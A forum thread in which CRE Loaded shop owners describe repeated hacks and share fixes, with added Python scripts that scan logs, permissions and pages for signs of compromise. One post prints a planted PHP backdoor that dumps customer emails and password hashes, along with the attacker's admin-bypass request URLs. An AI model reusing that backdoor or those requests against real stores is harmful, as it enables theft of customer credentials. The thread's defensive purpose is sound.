6.2 sites getting hacked repeatedly !


This topic contains 17 replies, has 16 voices, and was last updated by Taipo 7 years, 11 months ago.

  • #29308

    fastdns
    Participant

    Hi,

    I am having a serious virus issue with almost all my sites running CRE Loaded 6.2.

    They are getting infected repeatedly by some virus. It infects all PHP pages and, in some instances, creates random folders such as:

    /catalog/llft/vjw-einz-sszfk.html
    /catalog/bxnl/wso-ecry-tplli.html
    /catalog/wwsw/ccm-xmat-bficd.html
    /catalog/jzlw/hro-ovqi-bqvry.html
    /catalog/lxdt/nud-xahn-viojz.html

    I have patched my cart up to Patch 14 and have also secured the admin area with a password-protected folder, but the virus comes back after a day.

    Has anyone seen this issue before? Can the community help me please? I read all the security threads posted in this forum, but none matches my situation 🙁

    Please help.

    Regards,

    fastDNS

  • #124419

    blauweogen2
    Participant

    I have had a few 6.4 sites hacked lately. My host removed the virus, but I am looking to stop it from happening again. Anyone know if the patches will stop it?

  • #124420

    iantresman
    Participant

    My v6.2 B2B[13.1 (SP1)] was also getting hacked. One of the symptoms was that my “Define MainPage” text disappears.

    Here is my solution (symptoms follow)

    Since all the attacks were via the /admin/ directory, and since I did not have time to patch all the possible files, I have simply restricted access to all /admin/ files to selected IP addresses by adding the following configuration to /admin/.htaccess:

    Original end of /admin/.htaccess file:


    order allow,deny
    deny from all

    Modified end of /admin/.htaccess file:


    order allow,deny
    deny from all


    #Only users from my IP address, and a colleague

    order deny,allow
    deny from all
    allow from 11.22.33.44
    allow from 123.123.123.123

    Where the “allow from” IP addresses correspond to your (and authorised) IP addresses. You can check your own IP address at IP Chicken.

    Symptoms of the hacks

    Here’s what I discovered.

    My log files showed a number of accesses from Ukraine (IP=91.211.16.126), showing exploits of one or more of the following:

    - /shop/admin/file_manager.php/login.php?action=processuploads
    - /shop/admin/define_mainpage.php/login.php?lngdir=english&filename=mainpage.php&action=save
    - /shop/admin/define_language.php/login.php?filename=cookie_usage.php&action=save&language=english
    - /shop/goog1e_analist_591dcabf272245.php?cookies=1 (not google)
    - /shop/admin/manufacturers.php/login.php?action=insert
    - /shop/admin/categories.php/login.php?action=new_product_preview
    - /shop/includes/languages/english/mainpage.php?cookies=1
    - /shop/cookie_usage.php?cookies=1&language=english
    - /shop/images/goog1eb3852156971218.php

    Note that some of these do not access the /admin/ directory directly.

    I found a number of unauthorized files in my admin/images/ folder, including some beginning with the string “goog1e” (not google), containing the code:

    Goog1e_analist_up

    And also an unauthorized file called mhp.php containing the following code:

    <?php

    $p=$_REQUEST;

    if (!isset($p) || md5($p)!='c180aaadf5ab10fb3a733f43f3ffc4b3') die ('');

    if ($_REQUEST == '1') unlink($HTTP_SERVER_VARS);

    echo "#mhpver11"."n";
    //mail hash parser oscommerce
    include "../includes/database_tables.php";
    include "../includes/configure.php";

    $link = mysql_connect(DB_SERVER, DB_SERVER_USERNAME, DB_SERVER_PASSWORD)
    or die("Could not connect");

    mysql_select_db(DB_DATABASE);

    $result = mysql_query ("SELECT customers_email_address,customers_password FROM ".TABLE_CUSTOMERS);

    while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {

    $l = $line.":".$line;
    if (preg_match("/:[a-f0-9]{32}:[a-f0-9]{2}/i",$l)) echo $l."n";
    }
    ?>

    The latter seems to acquire your customer passwords (though these should not be stored in your database!).

    And finally

    On entering the Admin login screen, there are often messages to upgrade to the next version of CRE Loaded. I do not recall ever seeing a note that there is a security patch.
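The request list in the post above has a structural tell that a defender can match in access logs without knowing the specific exploit: several admin scripts are called with a second `.php` component appended as path info (`/admin/file_manager.php/login.php?...`), and PHP scripts are being requested from the images directory, some under the lookalike name `goog1e`. The following is an added example (not from the thread or from CRE Loaded) that scans Apache combined-format log lines for those three patterns; the log lines, IP addresses (TEST-NET range) and rule names are constructed. Requests such as `cookie_usage.php?cookies=1` look like normal traffic by path alone, so the rules deliberately only flag the structurally abnormal ones.

```python
"""Flag request patterns of the kind listed in the post above in an Apache
access log. Added example, not part of the thread; all log lines are constructed."""
import re
from collections import Counter

# Constructed sample in Apache "combined" format; 192.0.2.0/24 is a documentation range.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Nov/2010:10:00:01 +0000] "GET /shop/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.77 - - [01/Nov/2010:10:00:05 +0000] "POST /shop/admin/file_manager.php/login.php?action=processuploads HTTP/1.1" 200 310 "-" "Mozilla/4.0"
192.0.2.77 - - [01/Nov/2010:10:00:09 +0000] "GET /shop/admin/define_mainpage.php/login.php?lngdir=english&filename=mainpage.php&action=save HTTP/1.1" 200 310 "-" "Mozilla/4.0"
192.0.2.77 - - [01/Nov/2010:10:01:12 +0000] "GET /shop/images/goog1eb3852156971218.php HTTP/1.1" 200 88 "-" "Mozilla/4.0"
192.0.2.10 - - [01/Nov/2010:10:02:00 +0000] "GET /shop/admin/login.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.10 - - [01/Nov/2010:10:02:30 +0000] "GET /shop/images/logo.png HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Rule 1: a .php script with a further path component appended (path info such as
# /admin/x.php/login.php). Normal cart URLs carry a query string, never path info.
PATHINFO_RE = re.compile(r'\.php/[^?]', re.I)
# Rule 2: a server-side script requested from a directory that should hold only images.
SCRIPT_IN_IMAGES_RE = re.compile(r'/images/[^?]*\.(?:php\d?|phtml)(?:[?/]|$)', re.I)
# Rule 3: the lookalike file name seen in the thread ("goog1e" with a digit one).
LOOKALIKE_RE = re.compile(r'goog1e', re.I)


def classify(path):
    """Return the list of rule names a request path trips (empty if nothing matches)."""
    hits = []
    if PATHINFO_RE.search(path):
        hits.append('admin-pathinfo' if '/admin/' in path.lower() else 'pathinfo')
    if SCRIPT_IN_IMAGES_RE.search(path):
        hits.append('script-in-images')
    if LOOKALIKE_RE.search(path):
        hits.append('lookalike-name')
    return hits


def scan_log(text):
    """Parse combined-format lines; return (findings, requests-per-IP counter).
    Each finding records source IP, request path, status and the rules tripped."""
    findings = []
    per_ip = Counter()
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        rules = classify(m.group('path'))
        if rules:
            findings.append({'ip': m.group('ip'), 'path': m.group('path'),
                             'status': int(m.group('status')), 'rules': rules})
            per_ip[m.group('ip')] += 1
    return findings, per_ip


if __name__ == '__main__':
    found, ips = scan_log(SAMPLE_LOG)
    for f in found:
        print(f"{f['ip']} {f['status']} {','.join(f['rules'])} {f['path']}")
    print('flagged requests per source IP:', dict(ips))
```

Run it against a real log with `scan_log(open('access_log').read())`; a 200 status on an `admin-pathinfo` hit is the case worth investigating first, because it means the admin script executed rather than being turned away.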

  • #124421

    cutiecute
    Participant

    Thanks Ian. Very helpful. I’ve been hacked about 10 times in 4 months.

  • #124422

    martinvelikov
    Participant

    @fastdns

    Make sure malicious files do not remain uploaded under your account. It is very good that you have password-protected the admin directory.

    However, you might already have a malicious script uploaded that allows the attacker access to your website. You should make sure all files are clean.

  • #124423

    soundzgood2
    Participant

    @iantresman wrote:

    #Only users from my IP address, and a colleague

    order deny,allow
    deny from all
    allow from 11.22.33.44
    allow from 123.123.123.123

    Don’t think that works using containers… if you want to restrict admin access to certain IP addresses I’d try:


    Order Deny,Allow
    Deny from all
    allow from 11.22.33.44
    allow from 123.123.123.123

    Should also point out that you don’t necessarily need all 4 ‘octets’ of the IP address – this is particularly useful to know if you’re on a dynamic IP (which a lot of people are). Often ISPs assign a limited range to users which doesn’t change that often, and using this example you might be OK to allow from 11.22 or allow from 123.123.

    My 5c worth,
    Simon

  • #124424

    Sal
    Keymaster

    Thanks to those that gave the security tips.

    I will have Charles review this thread to ensure we have addressed any exposures.

  • #124425

    slopez
    Participant

    We are also being hacked repeatedly on all sites from 6.2.14 to 6.4. Why doesn’t CreLoaded have security measures like the ones in osCommerce?

    What can we do aside from blocking IP addresses, modifying the htaccess file and password protecting the admin? We have gotten hacked even when all three of those options have been completed.

  • #124426

    soundzgood2
    Participant

    @slopez wrote:

    We are also being hacked repeatedly on all sites from 6.2.14 to 6.4. Why doesn’t CreLoaded have security measures like the ones in osCommerce?

    What can we do aside from blocking IP addresses, modifying the htaccess file and password protecting the admin? We have gotten hacked even when all three of those options have been completed.

    I think a better question is ‘why doesn’t Cre update its software more frequently?’ – given that the last patch was Xmas 2009. A basic (and arguably the most important) security measure is to stay current – upgrade/update to the latest version of the software. If the company can’t keep up then your choice is pretty obvious.

    However, no cart software is ‘hack proof’ indefinitely; you just reduce the chance of getting hacked by how you run your store. Also, the hosting company has just as important a role in securing the server – there are many configuration settings that can improve your site’s security dramatically.

    Are you certain you removed all traces of a hack attempt? Hey, give an example store via pm if you like – I’ll check for some obvious flaws and let yer know!

    Simon

  • #124427

    cazabra
    Participant

    This is happening to login.php and languages/***/login.php as well.
    Those files are just plain disappearing in the free CRE versions, and going blank on the pro versions,
    and this is WITH a double admin login (.htaccess required login added).

    I haven’t found the malicious files causing it yet. Will post back when I do in case they are out to get anyone else.

  • #124428

    David Graham

    The key word in the title of this thread is “sites”.

    I’ve cleaned up a number of these sites in the past few years. The log entries mentioned are typical – but have NOT been demonstrably effective in penetrating clean cart setups of the same version yet.

    What is pretty consistent is that, if caught early, when FTP logs are available the files in question can be seen to have been uploaded using a valid set of FTP credentials.

  • #124429

    diane
    Participant

    The lack of response by CRE is disturbing. We have had 4 sites hacked and it is not just 6.2.14. What’s disturbing is the last CRE login was 10/30/2010 and there is not a patch or a fix to be found on the net. Is CRE a shopping cart or a credit card processor? At some point they have to decide. The internet has changed so much, but from 1996 to today (original site on Xoom) I cannot find a cart that delivers and, worse, really takes this stuff seriously. But they are very quick to accept your money and sell you services that are like calling a cable company.

    Sal, you really need to start living up to the narcissistic “visionary” you claim to be. 10/30 and no response: not the impression anyone gives a crap.

    Leaving CRE

  • #124430

    Anonymous

    I’ve just done two days working 19 hours a day to move my site from B2B 6.2 to Community 6.4 in the hope that a hacker will go away.

    For over a week one of my sites has been hit with XSS hacks. The solution is easy enough: I just copied over a clean set of files I keep. I did that every few days at the start, but the last attack was within minutes of the clean-up.

    Thing is I’m also in the middle of moving the site over to another cart so this is all work that will be lost in a month or so.

  • #124432

    shawnlg777
    Participant

    Hey guys, one thing I noticed in mine that may or may not help… There is a file being dropped in my main public_html folder called postinfo.php. It was one that continued to add JavaScript to the site. Check and make sure you don’t have it on your server. That wasn’t the only problem, but definitely one of them.

  • #124431

    1Gighost
    Participant

    I host around 200 CRE Loaded domains and this is a constant issue.

    This hack rips your database for users and then sends out emails using the same script. In some instances the email is for drugs; others are redirects to other trojan-infected sites.

    TRULY A PAIN for me in general.

    The intrusion comes from one of several places; the most common is the /images folder. The security issue is that the folder must be set at 777 for image uploads (which are all owned, incidentally, by “nobody”). They force the script uploads, parse your database and then use your account to send tens of thousands of emails.
    Any other folder set to 777 is vulnerable without taking specific precautions.

    We have been forced to install cron jobs to set folders to 755 and files to 644 in osCommerce stores (CRE included).

    We are forced to “boot” clients that have repeat intrusions, as we cannot babysit every store ourselves.

    For the developers: needing folders set at 777 is a real issue for us, as is files on shared servers owned by “nobody”.

    I make a substantial amount of income fixing these sites (time is not free, sorry to say), but finding my IPs on RBLs is a bigger issue from the spam sent out.
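The post above describes two conditions a host can audit for rather than discover after the spam run: directories left world-writable (777) and PHP scripts sitting in the images upload folder. The following is an added example, not the hosting provider's cron job or any CRE Loaded code, of a store-root audit that reports both and, in fix mode, resets world-writable entries to the 755/644 baseline the post mentions. The store layout it builds is constructed in a temporary directory; the dropped script is an inert placeholder. Rogue scripts are only reported, since deciding whether a file is malicious is a manual step (and the file itself may be evidence).

```python
"""Audit a store document root for world-writable entries and server-side scripts in
upload directories. Added example, not the provider's cron job; the sample tree is
constructed in a temp directory."""
import os
import stat
import tempfile

UPLOAD_DIRS = ('images',)                # directories expected to hold only static files
SCRIPT_EXTS = ('.php', '.php3', '.php4', '.php5', '.phtml', '.pht')
DIR_MODE, FILE_MODE = 0o755, 0o644       # the baseline the cron job in the post enforces


def audit(root, fix=False):
    """Walk root and return findings. With fix=True, world-writable entries are reset
    to 755 (directories) / 644 (files); scripts in upload dirs are only reported."""
    findings = {'world_writable': [], 'scripts_in_uploads': [], 'fixed': []}
    for dirpath, dirnames, filenames in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        in_upload_dir = any(part in UPLOAD_DIRS for part in rel_dir.split(os.sep))
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            if stat.S_ISLNK(st.st_mode):
                continue                 # never follow or chmod through symlinks
            rel = os.path.relpath(full, root)
            if st.st_mode & stat.S_IWOTH:
                findings['world_writable'].append(rel)
                if fix:
                    os.chmod(full, DIR_MODE if stat.S_ISDIR(st.st_mode) else FILE_MODE)
                    findings['fixed'].append(rel)
            if (in_upload_dir and not stat.S_ISDIR(st.st_mode)
                    and name.lower().endswith(SCRIPT_EXTS)):
                findings['scripts_in_uploads'].append(rel)
    return findings


def mode_of(root, *parts):
    """Permission bits (as an int) of root/parts..., for checking the fix took effect."""
    return os.stat(os.path.join(root, *parts)).st_mode & 0o777


def build_sample_tree():
    """Constructed store layout reproducing the scenario in the post: catalog/images at
    777 holding a dropped PHP file (inert placeholder), plus a normal includes dir."""
    root = tempfile.mkdtemp(prefix='store_')
    os.makedirs(os.path.join(root, 'catalog', 'images'))
    os.makedirs(os.path.join(root, 'catalog', 'includes'))
    files = {
        ('catalog', 'images', 'logo.png'): b'\x89PNG',
        ('catalog', 'images', 'dropped.php'): b'<?php /* constructed placeholder */ ?>',
        ('catalog', 'includes', 'configure.php'): b'<?php /* constructed */ ?>',
    }
    for parts, body in files.items():
        with open(os.path.join(root, *parts), 'wb') as f:
            f.write(body)
    # set modes explicitly so the result does not depend on the process umask
    for parts in (('catalog',), ('catalog', 'includes')):
        os.chmod(os.path.join(root, *parts), 0o755)
    os.chmod(os.path.join(root, 'catalog', 'images'), 0o777)
    os.chmod(os.path.join(root, 'catalog', 'images', 'logo.png'), 0o644)
    os.chmod(os.path.join(root, 'catalog', 'includes', 'configure.php'), 0o644)
    os.chmod(os.path.join(root, 'catalog', 'images', 'dropped.php'), 0o666)
    return root


if __name__ == '__main__':
    root = build_sample_tree()
    print('before:', audit(root))
    print('fixing:', audit(root, fix=True)['fixed'])
    print('after: ', audit(root))
```

Run as a cron job with `fix=True` it replaces the blanket `chmod -R` with a targeted one, and the `scripts_in_uploads` list is the part worth alerting on, since a 755 images folder does not help once a script is already inside it.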

  • #124433

    David Graham

    We are continuing to see clients who are in need of site clean ups and patch application.

    While there are a dozen or so different approaches being used to penetrate the sites, almost all of them boil down to exploiting the PHP_SELF vulnerability reported ages ago in this forum.

    A basic patch for this takes about 15 minutes, including getting your site access ducks in a row.

    Other means of penetration seen include several cases of using Microsoft Front Page to access the site. This product is no longer supported by Microsoft for the express reason that it is inherently not secure. If your site is configured to use it, remove this capability at once.

    Another method is the use of CGI form posts on CGI enabled servers. Disabling the CGI service is worth considering.

    David

  • #124435

    flexartgroup
    Participant

    Hi

    Here you can download a file http://diovo.com/2009/03/hidden-iframe-injection-attacks/ that will tell you exactly where your site is infected.

    Download this file from
    http://www.diovo.com/wp-content/uploads/2009/03/clean.php.txt, rename it to clean.php and upload it to the root.

    To check, go to
    http://www.yourdomain.com/clean.php?c=iframe (replace it with your domain)

    Also I would recommend using secure FTP.
    Most hackers and Trojans will get at the text file with your username and password created by the FTP program. With secure FTP you will not have this problem.

    Cheers,

    Edwin
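Several posts in this thread describe the same footprint from the file side: JavaScript or a hidden iframe appended to pages, and the recommended fix of copying a clean file set back over the site. The following is an added example, not the clean.php tool linked above and not CRE Loaded code, of a read-only content scan that walks a site tree and flags files containing a hidden or one-pixel iframe, a script block that decodes an obfuscated payload, or markup appended after the closing `</html>` tag. The sample pages are constructed and the injected URL is a reserved `.invalid` name.

```python
"""Scan site files for injected hidden iframes and obfuscated script blocks.
Added example, not the clean.php tool from the post; sample files are constructed."""
import os
import re
import tempfile

TEXT_EXTS = ('.php', '.html', '.htm', '.js', '.tpl')

# Constructed sample contents; the injected iframe points at a reserved .invalid host.
CLEAN_PAGE = "<html><body><h1>Store</h1><img src='images/logo.png'></body></html>"
INJECTED_PAGE = ('<html><body><h1>Store</h1></body></html>'
                 '<iframe src="http://example.invalid/x" width="1" height="1" '
                 'style="visibility:hidden"></iframe>')
INJECTED_FOOTER = ("<?php echo 'footer'; ?>\n"
                   "<script>eval(unescape('%61%6c%65%72%74'))</script>")

PATTERNS = {
    # iframe sized 0/1 pixel or hidden through CSS: no legitimate reason on a cart page
    'hidden-iframe': re.compile(
        r'<iframe\b[^>]*?(?:width\s*=\s*["\']?[01]\b|height\s*=\s*["\']?[01]\b|'
        r'display\s*:\s*none|visibility\s*:\s*hidden)[^>]*>', re.I | re.S),
    # script block whose first statement decodes or evaluates a packed payload
    'obfuscated-script': re.compile(
        r'<script\b[^>]*>[^<]*\b(?:eval|unescape|String\.fromCharCode)\s*\(', re.I | re.S),
    # anything appended after </html> is a common sign of a file rewritten by a script
    'content-after-html': re.compile(r'</html>\s*<(?:iframe|script)\b', re.I),
}


def scan_text(text):
    """Return the sorted names of the patterns that match one file's content."""
    return sorted(name for name, rx in PATTERNS.items() if rx.search(text))


def scan_tree(root):
    """Return {relative path: [pattern names]} for every flagged text file under root."""
    flagged = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(TEXT_EXTS):
                continue
            full = os.path.join(dirpath, name)
            try:
                with open(full, 'r', encoding='utf-8', errors='replace') as f:
                    hits = scan_text(f.read())
            except OSError:
                continue                 # unreadable file: skip, do not abort the scan
            if hits:
                flagged[os.path.relpath(full, root)] = hits
    return flagged


def build_sample_site():
    """Constructed site: one clean page, one page with an appended hidden iframe,
    one footer include with an obfuscated script block."""
    root = tempfile.mkdtemp(prefix='site_')
    os.makedirs(os.path.join(root, 'catalog'))
    for rel, body in (('index.php', CLEAN_PAGE),
                      ('catalog/index.php', INJECTED_PAGE),
                      ('catalog/footer.php', INJECTED_FOOTER)):
        with open(os.path.join(root, rel), 'w', encoding='utf-8') as f:
            f.write(body)
    return root


if __name__ == '__main__':
    for path, hits in sorted(scan_tree(build_sample_site()).items()):
        print(f'{path}: {", ".join(hits)}')
```

Hits are leads, not verdicts: a legitimate tracking snippet can use `unescape`, so compare each flagged file against the clean copy (as the poster above who keeps one does) before replacing it, and treat a file that keeps coming back as a sign the upload path is still open.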

  • #124436

    Taipo
    Participant

    I wrote a security addon called osC_Sec which may also help:
    http://addons.oscommerce.com/info/7834

    Although it is developed for osCommerce it should also work for CRE Loaded.

    The install instructions are geared obviously toward osCommerce but basically the only difference is where to include the code in the application_top.php files.

    In both application_top.php files find:

    include('includes/version.php');

    In the following line place the require_once code stipulated in the readme.htm within the zip file.
